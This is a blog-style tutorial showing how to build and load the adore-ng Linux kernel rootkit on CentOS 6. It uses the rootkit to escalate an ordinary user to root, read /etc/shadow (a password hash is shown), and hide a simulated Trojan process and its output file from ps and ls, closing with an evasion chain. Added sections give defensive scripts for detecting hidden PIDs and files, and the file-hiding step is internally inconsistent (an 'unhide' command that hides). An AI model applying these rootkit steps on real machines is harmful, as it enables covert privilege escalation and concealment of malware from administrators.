adore-ng: a Linux kernel rootkit used to hide a Trojan

A rootkit is a special kind of malicious software. Its job is to hide its own presence on the machine it is installed on, together with whatever files, processes and network connections the attacker selects. A rootkit is rarely used alone: it is usually combined with a Trojan, a backdoor or another malicious program that does the actual work, and its role is to keep that program out of sight.

Spy films, which we all watch, have one indispensable character. His duty: a good cover keeps the other side unaware of him for a long time; he wins the enemy's trust and so obtains an important post, which lets him keep collecting important information and send it back through a channel of his own.

What we will walk through today, in a simulation, is a rootkit that plays much the same role: adore-ng.

Environment: CentOS 6

Two resources are needed (both downloadable):

  • adore-ng-master.zip (link)
  • kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm (link)

Install adore-ng

Build dependency: kernel-devel for the running kernel (2.6.32-754.27.1.el6). The module is compiled against these headers, so the kernel-devel version must match the output of uname -r exactly; a module built against a different kernel is rejected by insmod with "Invalid module format".

[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm 
Loaded plugins: fastestmirror, security
Setting up Install Process
......
Installed:
  kernel-devel.x86_64 0:2.6.32-754.27.1.el6                                                                                          
Complete!

Extract and build adore-ng

[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root  1143 Dec 30  2015 Makefile
# A Makefile is already provided, so build directly with make -j 4
[root@Fp-01 adore-ng-master]# make -j 4

Load the module (as root)

[root@Fp-01 adore-ng-master]# insmod adore-ng.ko

View the help of ava, the user-space control program

[root@Fp-01 adore-ng-master]# ./ava
       I print info (secret UID etc)	# Print rootkit info (secret UID etc.)
       h hide file	# Hide a file
       u unhide file	# Unhide a file
       r execute as root	# Run a command as root
       R remove PID forever	# Remove a PID permanently
       U uninstall adore	# Uninstall adore
       i make PID invisible	# Hide a PID
       v make PID visible	# Unhide a PID

Escalating an ordinary user to root

Add an ordinary user for the test

[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.

Copy adore-ng to /tmp, because after switching to tom the user can no longer enter /root. cp -r copies the directory recursively.

[root@Fp-01 ~]# cp -r adore-ng-master /tmp/

Switch users: log in to the server as tom

[root@Fp-01 ~]# ssh tom@10.0.0.11
Are you sure you want to continue connecting (yes/no)? yes
tom@10.0.0.11's password: 
[tom@Fp-01 ~]$ whoami
tom

Test: try to edit /etc/shadow

[tom@Fp-01 ~]$ vim /etc/shadow
"/etc/shadow" [Permission Denied]

Permission is denied, as expected for an ordinary user. Now use ava to escalate: ava r <command> runs the command as root.

[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
......

From another terminal, look at the process: it runs as root, so the escalation succeeded.

[root@Fp-01 ~]# ps -ef |grep /etc/shadow
root      32703  30867  0 12:03 pts/3    00:00:00 vim /etc/shadow
root      32727  32667  0 12:03 pts/4    00:00:00 grep /etc/shadow

Hide the Trojan process

Simulate writing a Trojan (working in /opt; the directory and the script are created through ava r, since tom cannot write to /opt)

[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.
#!/bin/bash

# Append a marker line to date.txt once a second, forever.
while :
do
        echo "This is the virus" >> date.txt
        sleep 1
done

A simple simulated Trojan: it appends "This is the virus" to date.txt once a second. Give it execute permission and run it in the background.

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.

First check the process by its PID

[tom@Fp-01 script]$ ps -ef |grep 33987
root      33987  30867  0 12:14 pts/3    00:00:00 /bin/bash ./a.sh
root      34137  33987  0 12:14 pts/3    00:00:00 sleep 1
tom       34139  30867  0 12:14 pts/3    00:00:00 grep 33987

The process is visible. Next, simulate the attacker hiding it.

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.

Hidden successfully. Checking the process list again, the process is no longer shown.

[tom@Fp-01 script]$ ps -ef |grep 33987
tom       34139  30867  0 12:14 pts/3    00:00:00 grep 33987
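The ps output above comes from readdir() on /proc, which is exactly what adore-ng filters. The following is an added example, not code from the original post or from adore-ng, showing how a defender can find a PID that has been hidden this way: every PID in the range is probed by a direct lookup of /proc/<pid>, and any PID that resolves but never appears in the /proc listing is reported. It assumes that the rootkit hooks only the directory listing and not the path lookup, which is true of adore-ng's process hiding but not of every rootkit; the 32768 upper bound is the CentOS 6 default for kernel.pid_max.

```shell
#!/bin/bash
# Added example, not from the original post: find processes that answer a
# direct /proc/<pid> lookup but are missing from the /proc directory
# listing.  adore-ng hides a PID by filtering it out of readdir() on /proc,
# which is what ps, top and `ls /proc` rely on; a path lookup of
# /proc/<pid> goes through a different kernel path and still succeeds
# (assumption: the hook is on readdir only, as in adore-ng).

# PIDs that a readdir() on /proc reveals, one per line.
listed_pids() {
    ls -1 /proc 2>/dev/null | grep -E '^[0-9]+$'
}

# Does /proc/<pid> resolve by direct lookup?  0 = yes, 1 = no.
probe_pid() {
    [ -d "/proc/$1" ]
}

# /proc/<n> also resolves when n is a thread ID, and threads are never
# listed in /proc, so only thread-group leaders (Tgid == pid) count;
# otherwise every thread of a multithreaded daemon would look "hidden".
is_thread_leader() {
    local tgid
    tgid=$(awk '/^Tgid:/ { print $2 }' "/proc/$1/status" 2>/dev/null)
    [ "$tgid" = "$1" ]
}

# Print "<pid> <cmdline>" for every PID in 1..$1 that resolves by path,
# is a thread-group leader, and appears in neither a listing taken before
# nor one taken after the scan (the two snapshots discard processes that
# merely started or exited while we were probing).  Default upper bound
# is 32768, the CentOS 6 kernel.pid_max; pass the value of
# /proc/sys/kernel/pid_max on systems with a larger range.
find_hidden_pids() {
    local max="${1:-32768}" before after reachable="" pid
    before=$(listed_pids)
    pid=1
    while [ "$pid" -le "$max" ]; do
        if probe_pid "$pid" && is_thread_leader "$pid"; then
            reachable="$reachable $pid"
        fi
        pid=$((pid + 1))
    done
    after=$(listed_pids)
    for pid in $reachable; do
        if ! printf '%s\n' "$before" | grep -qx "$pid" &&
           ! printf '%s\n' "$after" | grep -qx "$pid"; then
            printf '%s %s\n' "$pid" "$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)"
        fi
    done
}

# Run directly: scan the default range and report anything hidden.
find_hidden_pids "$@"
```

Run it from a root shell after the ava i step above; the hidden a.sh process, still reachable as /proc/33987, is printed with its command line even though ps no longer shows it. An empty result on a suspect machine is not proof of a clean one: a rootkit that also hooks the lookup path, or kills the probing process, defeats this check, which is why the same comparison should also be made from outside the running kernel (a rescue image, or the memory of the machine).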

The big one: hiding files

First, look at the files under /opt

[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
    ├── a.sh
    └── date.txt

Now hide date.txt. Note the command the post actually uses: ava u, whose help text and success message both say "unhide" and "visible". On this build the file nevertheless disappears afterwards (see the listing below), so check which of h and u really hides on the build you are running before relying on either.

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.

Check again (here as root): the file is no longer listed. Notice the "total" line of the listing, though: 48 blocks for a single 77-byte file. The block count no longer matches the visible entries, and small inconsistencies of this kind are what gives a hidden file away to a defender.

[root@Fp-01 script]# tree /opt/
/opt/
└── script
    └── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh
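Because adore-ng filters the directory listing rather than the path lookup, the hidden file is still there for anyone who knows its name, and a hidden directory still leaves a trace in its parent's link count. The following is an added example, not code from the original post or from adore-ng, giving both checks as shell functions. It assumes the same readdir()-only hooking as adore-ng's file hiding, a GNU coreutils stat, and a filesystem (ext2/3/4 or xfs, as on CentOS 6) that keeps the link count of a directory at 2 plus its number of subdirectories.

```shell
#!/bin/bash
# Added example, not part of the original post: two checks for entries
# that a readdir()-filtering rootkit such as adore-ng has hidden.
#
# 1. A name you already suspect: the entry is dropped from directory
#    listings, but a lookup by full path is a different kernel path and
#    still succeeds (assumption about the hook, true for adore-ng).  So
#    "exists by path but ls does not list it" means hidden.
# 2. A directory whose name you do not know: on ext2/3/4 and xfs a
#    directory's link count is 2 + (number of subdirectories), because
#    every child's ".." entry links back to it.  Hiding a child from
#    readdir() does not change that count, so
#        nlink - 2 - (subdirectories ls can see)
#    is the number of hidden subdirectories.

# Check 1.  0 = reachable by path but absent from the directory listing
# (hidden); 1 = listed normally, or does not exist at all.
is_hidden_entry() {
    local dir="$1" name="$2"
    [ -e "$dir/$name" ] || return 1             # direct lookup
    ! ls -1A -- "$dir" | grep -qxF -- "$name"   # readdir()-based listing
}

# Link count of a directory via stat(2).  "-c %h" is GNU coreutils syntax.
dir_nlink() {
    stat -c %h -- "$1"
}

# Subdirectories that a readdir()-based walk reveals ("." and ".."
# excluded, dot-directories included; symlinks to directories are not
# counted because they add no link to the parent).
visible_subdirs() {
    find "$1" -mindepth 1 -maxdepth 1 -type d | wc -l | tr -d ' '
}

# Check 2.  Prints how many subdirectories of $1 exist but are not listed.
# Prints "unsupported" where the filesystem does not keep directory link
# counts (btrfs reports 1 for every directory; ext4 with dir_nlink
# reports 1 once a directory has more than 64998 subdirectories), since
# the arithmetic is meaningless there.
hidden_subdir_count() {
    local dir="$1" nlink visible
    nlink=$(dir_nlink "$dir") || return 1
    if [ "$nlink" -lt 2 ]; then
        echo unsupported
        return 0
    fi
    visible=$(visible_subdirs "$dir")
    echo $(( nlink - 2 - visible ))
}

# Usage against the paths the post creates (skipped if they do not exist).
if [ -d /opt/script ]; then
    is_hidden_entry /opt/script date.txt && echo "date.txt is hidden in /opt/script"
    echo "hidden subdirectories under /opt: $(hidden_subdir_count /opt)"
fi
```

The first check is the one to use for the date.txt case above: stat /opt/script/date.txt still succeeds while ls /opt/script omits it. The second check covers the "hide folder" step of the attack chain, where the name is unknown; a positive count means a child directory exists that no listing shows. Neither check survives a rootkit that also hooks path lookup, so treat them as cheap triage, and confirm findings from a rescue image.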

The full chain: escalate to root -> hide the parent process -> the parent process starts the child process (the payload) -> hide the folder.

The result is a Trojan that the system administrator will find hard to discover with the usual tools.


Tags: vim RPM Makefile network

Posted on Thu, 13 Feb 2020 00:15:54 -0500 by dreamlove